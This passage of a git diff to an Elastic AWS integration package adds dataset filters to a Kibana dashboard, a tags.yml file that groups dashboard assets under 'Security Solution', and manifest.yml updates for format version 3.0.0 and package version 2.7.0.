"data_stream.dataset": "aws.dynamodb" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.ebs" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.ec2_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.ecs_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.elb_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.emr_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.firewall_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.kinesis" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.lambda" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.natgateway" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.rds" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.redshift" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.s3_daily_storage" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.s3_request" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.s3_storage_lens" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.sns" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.sqs" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.transitgateway" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.usage" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.vpn" + } + } + ] + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/tags.yml b/packages/aws/kibana/tags.yml new file mode 100644 index 000000000000..387b221009b5 --- /dev/null +++ b/packages/aws/kibana/tags.yml @@ -0,0 +1,21 @@ +- text: Security Solution + asset_ids: + - aws-4746e000-bacd-11e9-9f70-1f7bda85a5eb + - aws-562bdea0-4ba7-11ec-8282-5342b8988acc + - aws-383d4630-63df-11ed-be08-4b4db5223139 + - aws-131a1550-5a0b-11ed-a807-bd2da8f2e79b + - aws-68ba7bd0-20b6-11ea-8f72-2f8d21e50b0c + - aws-2ba11b50-4b9d-11ec-8282-5342b8988acc + - aws-3d3dbe00-f79f-11ec-aa7f-c173c0f9e267 + - aws-8fcf4c20-f7a3-11ec-aa7f-c173c0f9e267 + - aws-9d21f520-6a36-11ed-b880-2f1b70138655 + - aws-401261a0-6a39-11ed-b880-2f1b70138655 + - aws-c9f103d0-5f63-11ed-bd69-473ce047ef30 + - aws-cc571400-dc61-11ec-a6e3-1bc5ab0aa1b4 + - aws-f890a5b0-6a3a-11ed-b880-2f1b70138655 + - aws-b111d3a0-5f3e-11ed-b2ee-f91fa284c4b5 + - aws-b3169d70-6a38-11ed-b880-2f1b70138655 + - aws-cc2e2cf0-5f3f-11ed-b2ee-f91fa284c4b5 + - aws-df758050-6a49-11ed-b880-2f1b70138655 + - aws-dffd2200-5a52-11ed-a807-bd2da8f2e79b + - aws-15503340-4488-11ea-ad63-791a5dc86f10 diff --git a/packages/aws/manifest.yml b/packages/aws/manifest.yml index 2d271e9501b1..0d9bde4057f7 100644 --- a/packages/aws/manifest.yml +++ b/packages/aws/manifest.yml @@ -1,15 +1,16 @@ -format_version: 1.0.0 +format_version: 3.0.0 name: aws title: AWS -version: 2.6.1 -license: basic +version: 2.7.0 description: Collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent. type: integration categories: - aws -release: ga conditions: - kibana.version: "^8.9.0" + elastic: + subscription: basic + kibana: + version: "^8.9.0" screenshots: - src: /img/metricbeat-aws-overview.png title: metricbeat aws overview @@ -803,3 +804,4 @@ policy_templates: type: image/svg+xml owner: github: elastic/obs-cloud-monitoring + type: elastic